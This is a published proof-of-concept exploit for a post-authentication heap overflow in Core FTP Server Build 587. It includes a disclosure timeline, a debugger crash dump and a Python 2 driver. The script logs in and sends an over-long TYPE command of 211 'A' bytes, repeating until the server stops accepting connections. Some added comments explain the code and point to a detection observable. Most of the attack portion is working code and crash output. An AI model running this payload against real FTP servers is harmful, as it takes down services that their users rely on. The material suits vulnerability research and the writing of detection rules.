# -*- coding: cp1252 -*-
# Exploit Title: Core FTP Server 32-bit - Build 587 Heap Overflow
# Date: 05/10/2016
# Exploit Author: Paul Purcell
# Contact: ptpxploit at gmail
# Vendor Homepage: http://www.coreftp.com/
# Vulnerable Version Download: http://coreftp.com/server/download/archive/CoreFTPServer587.exe
# Version: Core FTP Server 32-bit - Build 587 32-bit
# Tested on: Windows XP SP3 x32 English, Windows 7 Pro x64 SP1 English, Windows 10 Pro x64 English
# Category: Remote Heap Overflow PoC
#
# Timeline: 03/03/16 Bug found
# 03/04/16 Vendor notified
# 03/06/16 Vendor replied acknowledging the issue
# 04/07/16 Vendor releases Build 588 which fixes the issue.
# 05/10/16 Exploit Released
#
# Summary: This exploit allows for a post-authentication DoS. The server does not do proper bounds checking on
# server responses. In this case, the long 'MODE set to ...' reply invoked by a long TYPE command
# causes a heap overflow and crashes the server process.
#
# Crash info:
#
# 0133FA2C32 30 30 20 4D 4F 44 45200 MODE
# 0133FA3420 73 65 74 20 74 6F 20 set to
# 0133FA3C41 41 41 41 41 41 41 41AAAAAAAA
# 0133FA4441 41 41 41 41 41 41 41AAAAAAAA
# 0133FA4C41 41 41 41 41 41 41 41AAAAAAAA
# 0133FA5441 41 41 41 41 41 41 41AAAAAAAA
# 0133FA5C41 41 41 41 41 41 41 41AAAAAAAA
# 0133FA6441 41 41 41 41 41 41 41AAAAAAAA
# 0133FA6C41 41 41 41 41 41 41 41AAAAAAAA
# 0133FA7441 41 41 41 41 41 41 41AAAAAAAA
# 0133FA7C41 41 41 41 41 41 41 41AAAAAAAA
# 0133FA8441 41 41 41 41 41 41 41AAAAAAAA
# 0133FA8C41 41 41 41 41 41 41 41AAAAAAAA
# 0133FA9441 41 41 41 41 41 41 41AAAAAAAA
# 0133FA9C41 41 41 41 41 41 41 41AAAAAAAA
# 0133FAA441 41 41 41 41 41 41 41AAAAAAAA
# 0133FAAC41 41 41 41 41 41 41 41AAAAAAAA
# 0133FAB441 41 41 41 41 41 41 41AAAAAAAA
# 0133FABC41 41 41 41 41 41 41 41AAAAAAAA
# 0133FAC441 41 41 41 41 41 41 41AAAAAAAA
# 0133FACC41 41 41 41 41 41 41 41AAAAAAAA
# 0133FAD441 41 41 41 41 41 41 41AAAAAAAA
# 0133FADC41 41 41 41 41 41 41 41AAAAAAAA
# 0133FAE441 41 41 41 41 41 41 41AAAAAAAA
# 0133FAEC41 41 41 41 41 41 41 41AAAAAAAA
# 0133FAF441 41 41 41 41 41 41 41AAAAAAAA
# 0133FAFC41 41 41 41 41 41 41 41AAAAAAAA
# 0133FB0441 41 41 41 41 41 41 41AAAAAAAA
# 0133FB0C58 02 00 00 8E EB 31 57X..Žë1W
#
# 00439827 . 8B86 3C040000MOV EAX,DWORD PTR DS:[ESI+43C] ;ESI invalid address: DS:[4141457D]=???
# 0043982D . 85C0 TEST EAX,EAX
#
# DS:[4141457D]=???
# EAX=00000000
#
# EAX 00000000
# ECX 00000000
# EDX 00000001
# EBX 01141B90
# ESP 0142C06C
# EBP 0143FB3C
# ESI 41414141
# EDI 00000000
# EIP 00439827 coresrvr.00439827
# C 1ES 0023 32bit 0(FFFFFFFF)
# P 1CS 001B 32bit 0(FFFFFFFF)
# A 1SS 0023 32bit 0(FFFFFFFF)
# Z 0DS 0023 32bit 0(FFFFFFFF)
# S 1FS 003B 32bit 7FFD8000(FFF)
# T 1GS 0000 NULL
# D 0
# O 0LastErr ERROR_SUCCESS (00000000)
# EFL 00000397 (NO,B,NE,BE,S,PE,L,LE)
# ST0 empty
# ST1 empty
# ST2 empty
# ST3 empty
# ST4 empty
# ST5 empty
# ST6 empty
# ST7 empty
#3 2 1 0E S P U O Z D I
# FST 0000Cond 0 0 0 0Err 0 0 0 0 0 0 0 0(GT)
# FCW 027FPrec NEAR,53Mask1 1 1 1 1 1
import time
import socket
from ftplib import FTP
# Proof-of-concept driver (Python 2 syntax: bare `print` statements).
# Flow: probe the control port, then repeatedly log in and send one
# over-long TYPE command until the port stops accepting connections.
# Per the header, the vendor fix is Build 588; the over-long TYPE argument
# (211 bytes of 'A') is visible on the FTP control channel after a
# successful login, which is the observable a detection rule would key on.
host='yourhost' #host or IP
port=21 #port
u="youruser"#username
p="yourpass"#password
pause=3 #pause between login & command attempts, normally 3 seconds is plenty of time.
command="TYPE "
evil="A"*211#Any more, and the program warns of buffer overflow attempt and ignores the command
evilTYPE=(command+evil) #Evil type command
# Reachability probe: connect_ex returns 0 on success, else an errno-style code.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# NOTE: `open` shadows the builtin open() for the rest of the script; it holds
# the connect_ex result code, not a file.
open = sock.connect_ex((host,port))
sock.close()
if (open == 0):
    print "FTP is up, lets fix that..."
    # 10061 is the Winsock WSAECONNREFUSED code, so this termination test is
    # specific to a Windows client; any other result (0, timeouts, other
    # errnos) keeps the loop going, and there is no iteration cap.
    while (open != 10061):
        print "Connecting to send evil TYPE command..."
        ftp = FTP()
        ftp.connect(host,port)
        ftp.login(u,p)
        ftp.sendcmd(evilTYPE)
        # close() is not in a try/finally: if connect/login/sendcmd raises,
        # the script exits with the control connection left to GC.
        ftp.close()
        # Give the server time to process the command before re-probing.
        time.sleep(pause)
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        open = sock.connect_ex((host,port))
        sock.close()
    print "No more files for you!"
else:
    print "Port "+str(port)+" does not seem to be open on "+host